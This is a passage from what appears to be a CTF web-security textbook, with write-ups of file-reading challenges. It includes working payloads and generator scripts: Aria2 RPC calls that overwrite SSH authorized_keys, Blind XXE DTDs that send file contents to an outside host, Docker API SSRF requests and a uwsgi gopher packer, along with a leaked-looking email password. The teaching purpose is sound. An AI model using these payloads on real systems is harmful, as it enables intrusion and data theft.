【Knowledge】 The protocol supported by the browser and the use of view-source; Node template injection; HTTP Request Header: Range.

【Challenge solving】 By auditing the source code, we find the template injection vulnerability and the rule used for server-side browser requests, which gives the direction of the solution: get the path of the flag, then read the content of the flag.

...
const FLAG_PATH = path.resolve(constant.ROOT_PATH, '********')
...
const FLAGFILENAME = process.env.FLAGFILENAME || '********'
...

Get the flag file name by injecting process.env.FLAGFILENAME through the template, then get the directory of the Node application by injecting process.env.PWD through the template. Use view-source: to display the result, which would otherwise be parsed as HTML tags, as shown in Fig. 1.72.

Fig. 1.72 Result

Read the FLAG_PATH in config.js using file://+ absolute path. See Fig. 1.73.

Fig. 1.73 Source code

Read the contents of the flag, using the Range field in the HTTP request header to control the start and end bytes of the output. The flag file in this challenge is so large that a direct request cannot display the part that contains the real flag, so the output has to be cut from the middle of the file, see Fig. 1.74.

Fig. 1.74 Result

  • 【Summary】 ① The arbitrary file reading vulnerability in the challenge has nothing to do with NodeJS. In essence, it uses the protocols supported by the browser, which makes it a relatively novel challenge.

  • ② The principle of reading files is to read on demand and not blindly. Reading the contents of files blindly will waste time.

  • ③ A similar challenge that relies on browser features is SEAFARING2 from the same competition: it attacks a selenium server through an SSRF vulnerability and controls the browser to request file:/// to read local files. Readers can search for this challenge if they are interested.

1.3.3.6 Translate (Google CTF 2018)

【Intro】 According to the {{userQuery}} returned by the challenge, we can quickly think that the challenge is template injection, which can be tested using the mathematical expression {{ 3*3 }}.

{
    ...
    "in_lang_query_is_spelled": "In french, <b>{{userQuery}}</b> is spelled <b ng-bind=\"i18n.word(userQuery)\"></b>.",
    ...
}

Using {{this.$parent.$parent.window.angular.module('demo')._invokeQueue[3][2][1]}} to read some code snippets, we find that i18n.template is used to render templates; the flag can then be read through i18n.template('./flag.txt').


【Difficulty】 Moderate.

【Knowledge】 Node template injection; read flag through i18n.template.

【Challenge solving】 First, find the template injection and use it to collect information. After obtaining enough information, use the template injection to call the file reading function and read the flag file.

【Summary】 The challenge involves knowledge of Node template injection and requires players to understand the template's syntax so that they can turn the template injection vulnerability into a file reading vulnerability.

1.3.3.7 Watching Animated Get the Flag (PWNHUB)

【Intro】 By scanning the subdomains, we found a site that recorded how the challenge environment was built (blog.loli.network), which shows that the Nginx configuration file is as follows:

location /bangumi {
    alias /var/www/html/bangumi/;
}
location /admin {
    alias /var/www/html/yaaw/;
}

After exploiting the directory traversal, the Aria2 configuration file is found in the parent directory, see Fig. 1.75.

Fig. 1.75 Get the Aria2 configuration file

It was also discovered that the Aria2 service is open on port 6800 of the challenge server.

enable-rpc=true
rpc-allow-origin-all=true
seed-time=0
disable-ipv6=true
rpc-listen-all=true
rpc-secret=FLAG{infactthisisnotthecorrectflag}

【Difficulty】 Moderate.

【Knowledge】 Nginx misconfiguration leading to directory traversal; Aria2 arbitrary file write vulnerability.

【Challenge solving】 First, collect the necessary information, including directories, subdomains, etc. The Nginx misconfiguration is discovered during testing. It can be derived from the Nginx configuration file obtained in the information collection step, but the directory traversal vulnerability can also be found directly through black-box testing. The critical condition for black-box testing is to understand the features of Nginx and its possible vulnerabilities; this saves the time required for information collection and leads directly to the second step of solving the challenge. Use the Nginx directory traversal to obtain the Aria2 configuration file and get the rpc-secret, then use the rpc-secret to exploit the Aria2 arbitrary file write vulnerability and write an SSH public key to the server.

First, send the following payload to set the server-side allow-overwrite option to true.

{
    "jsonrpc": "2.0",
    "method": "aria2.changeGlobalOption",
    "id": 1,
    "params": [
        "token:FLAG{infactthisisnotthecorrectflag}",
        { "allow-overwrite": "true" }
    ]
}

Then call the API to download a remote file and overwrite a local file of your choice (here, the authorized_keys file that holds the SSH public keys), and log in through SSH to get the flag.

{
    "jsonrpc": "2.0",
    "method": "aria2.addUri",
    "id": 1,
    "params": [
        "token:FLAG{infactthisisnotthecorrectflag}",
        ["http://x.x.x.x/1.txt"],
        {
            "dir": "/home/bangumi/.ssh",
            "out": "authorized_keys"
        }
    ]
}
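The two JSON-RPC calls can be generated by a small helper, sketched below. The function name aria2_overwrite_calls is hypothetical, the option key follows aria2's documented option name allow-overwrite, and the sketch only builds the request bodies; posting them to the RPC endpoint on port 6800 is left to the reader.

```python
import json


def aria2_overwrite_calls(secret: str, source_url: str, target_dir: str, out_name: str) -> list:
    """Build the two aria2 JSON-RPC request bodies as JSON strings."""
    token = f"token:{secret}"
    # Step 1: allow aria2 to overwrite files that already exist.
    enable_overwrite = {
        "jsonrpc": "2.0",
        "method": "aria2.changeGlobalOption",
        "id": 1,
        "params": [token, {"allow-overwrite": "true"}],
    }
    # Step 2: download source_url and save it as target_dir/out_name.
    add_uri = {
        "jsonrpc": "2.0",
        "method": "aria2.addUri",
        "id": 2,
        "params": [token, [source_url], {"dir": target_dir, "out": out_name}],
    }
    return [json.dumps(enable_overwrite), json.dumps(add_uri)]


for body in aria2_overwrite_calls(
    "FLAG{infactthisisnotthecorrectflag}",
    "http://x.x.x.x/1.txt",
    "/home/bangumi/.ssh",
    "authorized_keys",
):
    print(body)
```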

1.3.3.8 The Year 2013 (PWNHUB)

  • 【Intro】 (1) The .DS_Store file is found to exist. See Fig. 1.76.

  • (2) The .DS_Store file leaks the current directory structure. Through analysis of the .DS_Store file, it is found that there are directories such as upload and pwnhub.

  • (3) The pwnhub directory is configured to be forbidden in the Nginx file (the Nginx configuration file cannot be obtained in the early stage of the game and can only be judged by HTTP code 403). The configuration content is as follows.

location /pwnhub/ { deny all; }

  • (4) There is a hidden directory at the same level in pwnhub. The index.php file under it accepts any uploaded TAR archive and calls a Python script that extracts the archive automatically; the content of the file with the .cfg suffix in the archive is then returned.

<?php
// Set the encoding to UTF-8 to avoid garbled Chinese characters.
header('Content-Type:text/html;charset=utf-8');
# Quit when no files are uploaded
$file = $_FILES['upload'];
# Filename Unpredictability
$salt = base64_encode('8gss7sd09129ajcjai2283u821hcsass').mt_rand(80,65535);
$name = (md5(md5($file['name'].$salt).$salt).'.tar');
if (!isset($_FILES['upload']) or !is_uploaded_file($file['tmp_name'])) {
    exit;
}
# Move files to the appropriate folder
if (move_uploaded_file($file['tmp_name'], "/tmp/pwnhub/$name")) {
    $cfgName = trim(shell_exec('python /usr/local/nginx/html/6c58c8751bca32b9943b34d0ff29bc16/untar.py /tmp/pwnhub/'.$name));
    $cfgName = trim($cfgName);
    echo "<p>The update configuration is successful, with the following contents</p>";
    // echo '<br/>';
    echo '<textarea cols="30" rows="15">';
    readfile("/tmp/pwnhub/$cfgName");
    echo '</textarea>';
} else {
    echo("Failed!");
}
?>

#/usr/local/nginx/html/6c58c8751bca32b9943b34d0ff29bc16/untar.py
import tarfile
import sys
import uuid
import os

def untar(filename):
    os.chdir('/tmp/pwnhub/')
    t = tarfile.open(filename, 'r')
    for i in t.getnames():
        if '..' in i or '.cfg' != os.path.splitext(i)[1]:
            return 'error'
        else:
            try:
                t.extract(i, '/tmp/pwnhub/')
            except Exception, e:
                return e
            else:
                cfgName = str(uuid.uuid1()) + '.cfg'
                os.rename(i, cfgName)
                return cfgName

if __name__ == '__main__':
    filename = sys.argv[1]
    if not tarfile.is_tarfile(filename):
        exit('error')
    else:
        print untar(filename)

  • (5) By analyzing the Linux crontab tasks, it was found that there exists a cron task.

30 * * * * root sh /home/jdoajdoiq/jdijiqjwi/jiqji12i3198ua x192/cron_run.sh

  • (6) cron_run.sh executes a Python script that sends an email, which reveals the email account and password.

#coding:utf-8
import smtplib
from email.mime.text import MIMEText

mail_user = 'ctf_dicha@21cn.com'
mail_pass = '634DRaC62ehWK6X'
mail_server = 'smtp.21cn.com'
mail_port = 465
...

  • (7) Log in with the leaked email account and find the leaked VPN account and password in the mailbox. See Fig. 1.77.

  • (8) Log in to the intranet via VPN and find a flag-reading application served by Nginx. When the application is accessed, only Oh Hacked is displayed and no other output is available. A Discuz! X 3.4 application served by Apache runs on another port of the same IP.

...
$flag = "xxxxxxxxx";
include 'safe.php';
if($_REQUEST['passwd']='jiajiajiajia') {
    echo $flag;
}
...

Fig. 1.76 Get .DS_Store

Fig. 1.77 Mail content

【Difficulty】 Moderate.

【Knowledge】 A historical Nginx vulnerability that allows unauthorized access to a restricted directory; constructing a TAR archive that contains a soft link, uploading it, and reading the target file through the link; the arbitrary file deletion vulnerability of Discuz!X 3.4.

【Challenge solving】 Scan the directory to find .DS_Store (a file that macOS generates automatically to record how the files in a directory are laid out, so it contains file names and other information), and parse it to get all subdirectories and files in the current directory.

from ds_store import DSStore

with DSStore.open("DS_Store", "r+") as f:
    for i in f:
        print(i)

The upload directory name turns out to have an extra space at the end, which suggests that the Nginx parsing vulnerability (CVE-2013-4547) can be used to bypass the access restriction on the pwnhub directory. The idea is to use the parsing vulnerability so that the request fails to match the /pwnhub/ location rule in the Nginx configuration file, see Fig. 1.78.

Fig. 1.78 Result

The /pwnhub directory reveals a directory at the same level that contains a PHP file. Requesting that PHP file returns an upload form. See Fig. 1.79.

Fig. 1.79 Upload form

Upload a TAR archive through the PHP file. The application extracts the uploaded archive automatically (tarfile.open), so you can first create a soft link locally with the command ln -s, name it xxx.cfg, and then pack it with the tar command. After the TAR package is uploaded, the application outputs the content of the file that the soft link points to (see Fig. 1.80).

Fig. 1.80 Result
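As an alternative to ln -s followed by tar, the archive can be built in memory with Python's tarfile module. This is a minimal sketch; the helper name build_symlink_tar and the member name x.cfg are illustrative choices, and /etc/crontab is used as the link target because it is the file read in the next step.

```python
import io
import tarfile


def build_symlink_tar(link_name: str, target: str) -> bytes:
    """Return a TAR archive holding one symbolic link named link_name -> target."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name=link_name)
        info.type = tarfile.SYMTYPE   # the member is a symbolic link
        info.linkname = target        # the file the link points to
        tar.addfile(info)
    return buf.getvalue()


# The member name ends in .cfg and contains no "..", so it passes
# the checks in untar.py.
archive = build_symlink_tar("x.cfg", "/etc/crontab")
print(len(archive), "bytes")
```

The resulting bytes can be written to a .tar file and submitted through the upload form.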

Reading /etc/crontab reveals that a strange cron task has been started in crontab.

30 * * * * root sh /home/jdoajdoiq/jdijiqjwi/jiqji12i3198ua x192/cron_run.sh

Read the sh script called in crontab and find a Python script running internally; then read the Python script to get the leaked mailbox account and password, log in to the mailbox and get the leaked VPN account and password (see Fig. 1.81).

Fig. 1.81 VPN login

After successfully connecting to the VPN, scan the VPN's intranet to find the deployed Discuz!X 3.4 application and a flag reading service. Use the arbitrary file deletion vulnerability of Discuz!X 3.4 to delete safe.php, and then request the flag reading service to get the flag, see Fig. 1.82.

  • 【Summary】 ① The challenge resolution process is long, and players should have clear ideas.

  • ② In addition to directory traversal caused by improper configuration of Nginx, it also has historical vulnerabilities that can leak information.

The idea of solving this problem is shown in Fig. 1.83. There are many challenges to read arbitrary files by constructing soft links, such as extract0r of 34c3CTF, which will not be introduced in detail here.

Fig. 1.82 Get flag

Fig. 1.83 Writeup

1.3.3.9 Comment (NetDing Cup 2018 Online)

【Intro】 The challenge starts with a login page, as shown in Fig. 1.84. The challenge website exposes a .git directory, so the program's source code can be restored with the GitHack tool and then audited. The audit reveals a second-order injection, as shown in Fig. 1.85.

Fig. 1.84 Login form

Fig. 1.85 Source code

【Difficulty】 Moderate.

【Knowledge】 Source code leakage caused by an undeleted .git directory; second-order injection (MySQL); reading file content through the injection vulnerability with load_file (.bash_history->.DS_Store->flag).

【Challenge solving】 Use BurpSuite's Intruder module to brute-force the last three characters of the password; the parameter settings are shown in Fig. 1.86.

Fig. 1.86 The parameter settings in Burp

Restore the application source code through the leaked .git directory and audit it to find the SQL injection (second-order injection). Exploiting the injection shows that there is no flag in the database, but reading /etc/passwd with load_file succeeds. Note the user www and its home directory /home/www/, then read /home/www/.bash_history to find the commands previously run on the server:

cd /tmp/
unzip html.zip
rm -f html.zip
cp -r html /var/www/
cd /var/www/html/
rm -f .DS_Store
service apache2 start

Following the hint in .bash_history (the copy of .DS_Store under /var/www/html/ was deleted, but the one extracted under /tmp/html/ was not), read /tmp/html/.DS_Store, then find and read the flag file flag_8946e1ff1ee3e40f.php. Note that the load_file result needs to be encoded here, for example with the hex function of MySQL.
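Hex encoding keeps binary content such as .DS_Store intact on its way through the page. The sketch below builds the SQL expression and decodes the result; both helper names are hypothetical, and the path is passed as a MySQL hexadecimal literal so that the injected fragment needs no quotes.

```python
def hex_load_file_expr(path: str) -> str:
    """Build hex(load_file(...)) with the path written as a 0x hexadecimal literal."""
    return f"hex(load_file(0x{path.encode().hex()}))"


def decode_hex_result(hex_text: str) -> bytes:
    """Turn the hex string returned by MySQL back into the original bytes."""
    return bytes.fromhex(hex_text.strip())


print(hex_load_file_expr("/etc/passwd"))
print(decode_hex_result("666C6167"))
```

The decoded bytes can be written to a local file and parsed with the same .DS_Store tooling used earlier in this section.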

【Summary】 This challenge is a typical file reading exploit chain. After the MySQL injection is exploited, more directory information must be leaked through .bash_history, and the files it points to are then read.

1.3.3.10 The Ark Project (CISCN 2017)

【Intro】 The service of this challenge includes registration and login functions. After logging in with the administrator account, you can upload AVI files, which are automatically converted into MP4 files.

【Difficulty】 Easy.

【Knowledge】 Use inline comments to bypass SQL injection WAF; exploiting a vulnerability of FFMPEG to read arbitrary files.

【Challenge solving】 When a CTF Web challenge has login and registration functions, try SQL injection first. Black-box testing shows that there is an INSERT injection vulnerability in the registration stage. Deeper exploitation runs into a WAF, which can be bypassed with inline comments (/*!50001select*/), see Fig. 1.87.

Fig. 1.87 Bypass WAF
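MySQL executes the content of a /*!NNNNN ... */ comment when the server version is at least NNNNN, while a keyword-based WAF may treat it as an ordinary comment. The following sketch wraps selected keywords in that form; the function name and the default keyword list are assumptions for illustration, since the source does not say which keywords the WAF filtered.

```python
import re


def wrap_keywords(sql: str, keywords=("select", "union", "from"), version: str = "50001") -> str:
    """Wrap each listed SQL keyword in a MySQL versioned inline comment."""
    pattern = re.compile(
        r"\b(" + "|".join(map(re.escape, keywords)) + r")\b",
        re.IGNORECASE,
    )
    # Keep the keyword's original spelling inside the comment.
    return pattern.sub(lambda m: f"/*!{version}{m.group(0)}*/", sql)


print(wrap_keywords("select 1 from users"))
```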

Continue to obtain data through the injection vulnerability, obtain the administrator account, encrypted password, and encryption key (st_key), and obtain the plaintext password through AES decryption.

Log in to the administrator account with the username and password obtained through the injection, and find the video format conversion function on the administrator page. This suggests that the challenge is about the arbitrary file reading vulnerability of FFMPEG.

Use a known exploit script to generate a malicious AVI file and upload it, download the converted video, and play the video to find that the file content (/etc/passwd) can be successfully read, as shown in Fig. 1.88.

Fig. 1.88 Result

According to the contents of the /etc/passwd file, we found that there is a user named s0m3b0dy, and guessed that the flag is in his user directory, i.e., /home/s0m3b0dy/flag(.txt); continued to read the flag through the FFMPEG file reading vulnerability, and found that the flag was successfully obtained, see Fig. 1.89.

Fig. 1.89 Get flag

  • 【Summary】 ① This challenge uses a typical method of bypassing SQL injection WAF (inline comments).

  • ② This challenge closely follows hot security issues, and the results of reading files are presented in a novel and interesting way. The principle of the FFMPEG arbitrary file reading vulnerability is mainly that the HLS (HTTP Live Streaming) protocol supports the File protocol, which leads to the ability to read files into the video.

Another competition that presents the result of file reading in a distinctive way is the 2018 Nanjing University of Posts and Telecommunications competition, in which a challenge used PHP to generate pictures dynamically. When the file reading vulnerability is exploited, the content of the file that is read is drawn into the picture. See Fig. 1.90.

Fig. 1.90 Result

1.3.3.11 PrintMD (RealWorldCTF 2018 Online)

【Intro】 The challenge renders the content of an online Markdown editor (hackmd) into a printable form. Rendering is done either locally on the client side or remotely on the server side.

The client can perform local debugging, and the code for the remote rendering part of the server is as follows:

// render.js
const {Router} = require('express')
const {matchesUA} = require('browserslist-useragent')
const router = Router()
const axios = require('axios')
const md = require('../../plugins/md_srv')

router.post('/render', function (req, res, next) {
  let ret = {}
  ret.ssr = !matchesUA(req.body.ua, {
    browsers: ["last 1 version", "> 1%", "IE 10"],
    _allowHigherVersions: true
  });
  if (ret.ssr) {
    axios(req.body.url).then(r => {
      ret.mdbody = md.render(r.data)
      res.json(ret)
    })
  } else {
    ret.mdbody = md.render('# Please wait...')
    res.json(ret)
  }
});

module.exports = router

The Docker environment exists on the server, and the Docker service is started.

The path of the flag on the server is /flag.

【Difficulty】 Difficult.

【Knowledge】 JavaScript prototype pollution; Axios SSRF (UNIX Socket) attack on Docker API to read local files.

【Challenge solving】 Audit the client-side code obfuscated by Webpack, find the logic related to server-side communication in the application, and de-obfuscate the obfuscated code. The source code obtained is as follows:

validate: function(e) {
  return e.query.url && e.query.url.startsWith("https://hackmd.io/")
},
asyncData: function(ctx) {
  if (!ctx.query.url.endsWith("/download")) {
    ctx.query.url += "/download";
  }
  ctx.query.ua = ctx.req.headers["user-agent"] || "";
  return axios.post("/api/render", qs.stringify({...ctx.query})).then(function(e) {
    return { ...e.data, url: ctx.query.url }
  })
},
mounted: function() {
  if (!this.ssr) {
    axios(this.url).then(function(t) {
      this.mdbody = md.render(t.data)
    })
  }
}

Then use HTTP parameter pollution to bypass the startsWith restriction and, at the same time, use prototype pollution on req.body.url (server side), so that the server-side Axios receives the socketPath and url parameters when it makes the request. Then use the SSRF vulnerability to attack the Docker API: mount /flag into a Docker container and call the Docker API to read the file from the container.

The specific attack process is as follows.

  • ① Pull a lightweight image (equivalent to docker pull alpine:latest):

url[method]=post &url[url]=http://127.0.0.1/images/create?fromImage=alpine:latest &url[socketPath]=/var/run/docker.sock &url=https://hackmd.io/aaa

  • ② Create a container (equivalent to docker create -v /flag:/flagindocker --entrypoint "/bin/sh" --name ctf alpine:latest):

url[method]=post &url[url]=http://127.0.0.1/containers/create?name=ctf &url[data][Image]=alpine:latest &url[data][Volumes][flag][path]=/flagindocker &url[data][Binds][]=/flag:/flagindocker:ro &url[data][Entrypoint][]=/bin/sh &url[socketPath]=/var/run/docker.sock &url=https://hackmd.io/aaa

  • ③ Start the container (equivalent to docker start ctf):

url[method]=post &url[url]=http://127.0.0.1/containers/ctf/start &url[socketPath]=/var/run/docker.sock &url=https://hackmd.io/aaa

  • ④ Retrieve the flag file from the Docker container:

url[method]=get &url[url]=http://127.0.0.1/containers/ctf/archive?path=/flagindocker &url[socketPath]=/var/run/docker.sock &url=https://hackmd.io/aaa
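All four requests share one shape: a nested url[...] object that becomes the Axios request configuration, followed by a plain url value that satisfies the startsWith check. A hypothetical helper such as the one below can generate them; the function name and the way extra keys are passed are illustrative choices, and the values are left unencoded to match the payloads shown above.

```python
def build_payload(method: str, api_path: str, extra=()) -> str:
    """Build a polluted query string that targets the Docker API over its UNIX socket.

    extra is a sequence of (bracket_path, value) pairs, e.g. ("[data][Image]", "alpine:latest").
    """
    parts = [
        f"url[method]={method}",
        f"url[url]=http://127.0.0.1{api_path}",
    ]
    parts += [f"url{bracket_path}={value}" for bracket_path, value in extra]
    parts += [
        "url[socketPath]=/var/run/docker.sock",  # makes Axios talk to the Docker socket
        "url=https://hackmd.io/aaa",             # plain value that passes validate()
    ]
    return "&".join(parts)


print(build_payload("post", "/containers/ctf/start"))
print(build_payload(
    "post",
    "/containers/create?name=ctf",
    extra=[
        ("[data][Image]", "alpine:latest"),
        ("[data][Binds][]", "/flag:/flagindocker:ro"),
        ("[data][Entrypoint][]", "/bin/sh"),
    ],
))
```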

【Summary】 The challenge is very delicate and novel. Because Axios does not support the File protocol, players need to use SSRF to control other applications on the server to read files.

Like the Axios module, the curl component can also communicate over a UNIX socket.

1.3.3.12 The Careless Jia Jia (PWNHUB)

【Intro】 The entrance is a Drupal service. Information gathering shows that an FTP service with a weak password is open on port 23 of the server. After logging in to FTP with the weak password, the source code of a Drupal plug-in is found in the FTP directory, and the plug-in has a SQL injection vulnerability. There is also a Windows computer in the intranet with port 80 (Web service) open.

【Difficulty】 Moderate.

【Knowledge】 Padding Oracle Attack; Drupal 8.x Deserialization Vulnerability; Special Exploitation Techniques for Windows PHP Local File Inclusion/Reading.

【Challenge solving】 Following the challenge hint, brute-force the FTP login password; the FTP service turns out to have a weak login password.

An audit of the downloaded plug-in source code reveals a SQL injection vulnerability. However, user input is decrypted in AES-CBC mode before it is put into the SQL statement.

private function set_decrypt($id){
    if($c = base64_decode(base64_decode($id))) {
        if($iv = substr($c, 0, 16)) {
            if($pass = substr($c,17)) {
                if($u = openssl_decrypt($pass, METHOD, SECRET_KEY, OPENSSL_RAW_DATA,$iv)) {
                    return $u;
                } else die("hacker?");
            } else return 1;
        } else return 1;
    } else return 1;
}

public function get_by_id(Request $request){
    $nid = $request->get('id');
    $nid = $this->set_decrypt($nid);
    //echo $nid;
    $this->waf($nid);
    $query = db_query("SELECT nid, title, body_value FROM node_field_data left JOIN node__body ON node_field_data.nid=node__body.entity_id WHERE nid = {$nid}")->fetchAssoc();
    return array(
        '#title' => $this->t($query['title']),
        '#markup' => '<p>' . $this->t($query['body_value']) . '</p>',
    );
}

Auditing the decryption process shows that the ciphertext of a SQL injection statement can be forged through a padding oracle attack, see Fig. 1.91. The SQL injection vulnerability is then exploited to get the user's mailbox and mailbox password, see Fig. 1.92.

Fig. 1.91 Padding oracle attack

Fig. 1.92 Get email&password

Log in with the mailbox information, find the leaked online document address in the mailbox, open the document, and restore its historical version to find the admin password. Use the recovered admin password to log in to Drupal's admin system; the information there identifies the Drupal version, for which a deserialization vulnerability is found. The result of a deserialization payload that executes the phpinfo function is shown in Fig. 1.93.

Fig. 1.93 phpinfo

After gaining arbitrary code execution, scan the intranet. There is a Windows host running a Web service, and this Web service has a file reading vulnerability.

Further testing reveals a WAF: files with dangerous file names cannot be uploaded. Use “<” as a file name wildcard to bypass the WAF, for example “123333<.txt”.

【Summary】 The Padding Oracle Attack is a common Web security attack combined with cryptography, which needs to be learned.

On Windows, PHP file inclusion and file reading accept wildcards, which makes it possible to read a file when its name in the directory is unknown or when the WAF intercepts certain names. The wildcard rules are as follows: on Windows, “>” is equivalent to the regular wildcard “?”, “<” is equivalent to “*”, and “"” is equivalent to “.”.
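The three rules can be modeled with a short Python sketch that translates such a pattern into an ordinary glob and matches it against candidate file names. This is a simplified approximation for illustration, not the exact Windows matching algorithm; the function name and the candidate file names are hypothetical.

```python
from fnmatch import fnmatchcase

# Windows wildcard characters and their regular glob equivalents.
_TRANSLATE = str.maketrans({"<": "*", ">": "?", '"': "."})


def windows_php_glob(pattern: str, names):
    """Return the names that a Windows-style wildcard pattern would match."""
    regular = pattern.translate(_TRANSLATE).lower()
    # Windows file names are case-insensitive, so compare in lower case.
    return [name for name in names if fnmatchcase(name.lower(), regular)]


print(windows_php_glob("123333<.txt", ["123333_secret.txt", "other.txt"]))
print(windows_php_glob('fl>g"php', ["flag.php", "flaag.php"]))
```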

1.3.3.13 Educational institutions

【Intro】 The server of the challenge has a comment box. The comment box supports XML syntax, which can cause XXE; half of the flags are stored in the configuration file; there is a web service in the intranet.

【Difficulty】 Moderate.

【Knowledge】 Using the XXE vulnerability to read files and perform SSRF attacks.

【Challenge solving】 Scanning the application directory of the website shows that .idea/workspace.xml is leaked, and workspace.xml contains a commented-out passage of XML entity variables. The challenge has only one input point, the comment box, so test it for an XXE vulnerability: after the XML header <?xml version="1.0" encoding="utf-8"?> is submitted, an error appears in the response, see Fig. 1.94.

Fig. 1.94 Error in the response

The existence of the XXE vulnerability is basically confirmed by the simplexml_load_string function shown in the corresponding error message, and then an attempt is made to construct a remote entity call to implement the Blind XXE exploit. The data of the constructed exploit is as follows.

<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://ip/test/?xxe_local=%payload;'>">
%int;
%trick;
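A small generator makes it easy to change the target file between requests. The sketch below produces the external DTD, a request body that loads it, and a decoder for the exfiltrated value. The helper names and the attacker.example host are hypothetical, and the DOCTYPE wrapper is the usual Blind XXE form, which the source does not show.

```python
import base64


def build_external_dtd(target_file: str, exfil_url: str) -> str:
    """Build the DTD hosted by the attacker; the file content is sent to exfil_url."""
    return (
        f'<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource={target_file}">\n'
        f"<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM '{exfil_url}?xxe_local=%payload;'>\">\n"
        "%int;\n"
        "%trick;\n"
    )


def build_request_body(dtd_url: str) -> str:
    """Build the XML submitted in the comment box; it only pulls in the external DTD."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        f'<!DOCTYPE root [<!ENTITY % remote SYSTEM "{dtd_url}"> %remote;]>\n'
        "<root/>"
    )


def decode_exfiltrated(value: str) -> bytes:
    """Decode the Base64 value that arrives in the xxe_local parameter."""
    return base64.b64decode(value)


print(build_external_dtd("/etc/passwd", "http://attacker.example/test/"))
print(build_request_body("http://attacker.example/evil.dtd"))
```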

According to the error message when testing the existence of XXE, you can find the web directory location, read the source code of the web application using the XXE vulnerability, and find that half of the flag content exists in the config.php file.

#/var/www/52dandan.cc/public_html/config.php
<?php
...
define(SECRETFILE,'/var/www/52dandan.com/public_html/youwillneverknowthisfile_e2cd3614b63ccdcbfe7c8f07376fe431');
...
?>

#youwillneverknowthisfile_e2cd3614b63ccdcbfe7c8f07376fe431
Ok,you get the first part of flag : 5bdd3b0ba1fcb40
then you can do more to get more part of flag

A search for the other half of the flag on this host fails, which suggests that it is in the intranet. Read /etc/hosts and /proc/net/arp to get the intranet IP: 192.168.223.18.

Exploit the XXE vulnerability to access port 80 of 192.168.223.18 (a port scan is also possible; here we simply guess the common ports). The host runs a Web service with a SQL injection vulnerability. Use blind injection to get the other half of the flag.

<!ENTITY % payload SYSTEM "http://192.168.223.18/test.php?shop=3'-(case%a0when((1)like(1))then(0)else(1)end)-'1">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://ip/test/?xxe_local=%payload;'>">
%int;
%trick;

【Summary】 This challenge examines how to read files and exploit further through a PHP XXE vulnerability. The protocols supported by the XML extension differ from language to language. PHP distinctively supports the php:// protocol, so you can use the Base64 filter to encode the file content; this prevents Blind XXE from failing because special characters such as "&" and "<" truncate the data.

1.3.3.14 Magic Tunnel (RealworldCTF 2018)

【Intro】 The Web service is built with the Django framework and uses pycurl to request links submitted by users.

The source code of the part that requests the link is as follows.

...
def download(self, url):
    try:
        c = pycurl.Curl()
        c.setopt(pycurl.URL, url)
        c.setopt(pycurl.TIMEOUT, 10)
        response = c.perform_rb()
        c.close()
    except pycurl.error:
        response = b''
    return response
...

【Difficulty】 Difficult.

【Knowledge】 Attack on uwsgi through SSRF vulnerability.

【Challenge solving】 Read file:///proc/mounts through the file reading vulnerability to see how the Docker directories are mounted, as shown in Fig. 1.95.

Fig. 1.95 Result

After successfully finding the directory, the entire application's source code can be read through the file read vulnerability.

#!/bin/sh
BASE_DIR=$(pwd)
./manage.py collectstatic --no-input
./manage.py migrate --no-input
exec uwsgi --socket 0.0.0.0:8000 --module rwctf.wsgi --chdir ${BASE_DIR} --uid nobody --gid nogroup --cheaper-algo spare --cheaper 2 --cheaper-initial 4 --workers 10 --cheaper-step 1

Attack uwsgi by exploiting the Gopher protocol through an SSRF vulnerability (injecting SCRIPT_NAME to run malicious Python scripts or directly using EXEC to execute system commands).
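Because the uwsgi socket speaks a simple binary protocol, the whole request fits into a single gopher:// URL. The sketch below packs a dictionary of variables into a uwsgi packet (a 4-byte header followed by length-prefixed key/value pairs, all little-endian) and percent-encodes it. The function names and the example variables are placeholders, and the variables that actually trigger code execution are deliberately not filled in.

```python
import struct
from urllib.parse import quote_from_bytes


def pack_uwsgi_vars(variables: dict, modifier1: int = 0, modifier2: int = 0) -> bytes:
    """Pack variables into a uwsgi packet: header, then (len, key, len, value) pairs."""
    body = b""
    for key, value in variables.items():
        k, v = key.encode(), value.encode()
        body += struct.pack("<H", len(k)) + k + struct.pack("<H", len(v)) + v
    # Header: modifier1 (1 byte), body size (2 bytes, little-endian), modifier2 (1 byte).
    header = struct.pack("<BHB", modifier1, len(body), modifier2)
    return header + body


def to_gopher_url(host: str, port: int, packet: bytes) -> str:
    """Wrap raw bytes in a gopher URL; '_' is the dummy gopher item-type character."""
    return f"gopher://{host}:{port}/_" + quote_from_bytes(packet, safe="")


# Placeholder variables for illustration only.
packet = pack_uwsgi_vars({"REQUEST_METHOD": "GET", "SCRIPT_NAME": "/demo"})
print(to_gopher_url("127.0.0.1", 8000, packet))
```

When the URL is delivered through another HTTP parameter, it usually has to be percent-encoded once more so that the raw bytes survive the outer request.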

【Summary】 This challenge requires reading arbitrary files through the File protocol to gather information about the server, i.e., leaking the application path through /proc/mounts in order to know which file to read next.

1.3.3.15 Can You Find Me? (WHUCTF 2019)

【Intro】 There is an obvious file inclusion vulnerability in the challenge. The known information is that the relative path of the flag is ../../flag, but a WAF that prohibits relative path hopping is found when exploiting the file inclusion vulnerability.

<?php
error_reporting(0);
$file_name = @$_GET['file'];
if (preg_match('/\.\./', $file_name) !== 0){
    die("<h1> File names cannot have '..' </h1>");
}
...

【Difficulty】 Easy.

【Knowledge】 File reading vulnerabilities.

【Challenge solving】 Find the web directory by reading the Apache configuration file. See Fig. 1.96.

Fig. 1.96 Find the web directory by reading the Apache configuration file

Once the web directory is known, you can construct the absolute path of the flag file directly from the web directory to bypass the relative path restriction and read the flag, see Fig. 1.97.

Fig. 1.97 Get flag

【Summary】 This is a classic file reading challenge. It mainly examines the ability of players to collect information on Web configuration files. You need to find Web directories by reading Apache configuration files. By constructing absolute paths, you can bypass the restrictions of relative paths to get the flag file.

1.4 Summary

Among CTF’s Web challenges, information collection, SQL injection, and arbitrary file reading vulnerabilities are the most common and basic vulnerabilities. When encountering web-type challenges in the competition, we can first determine whether the above-mentioned web vulnerabilities are contained in the challenge and complete the challenge.

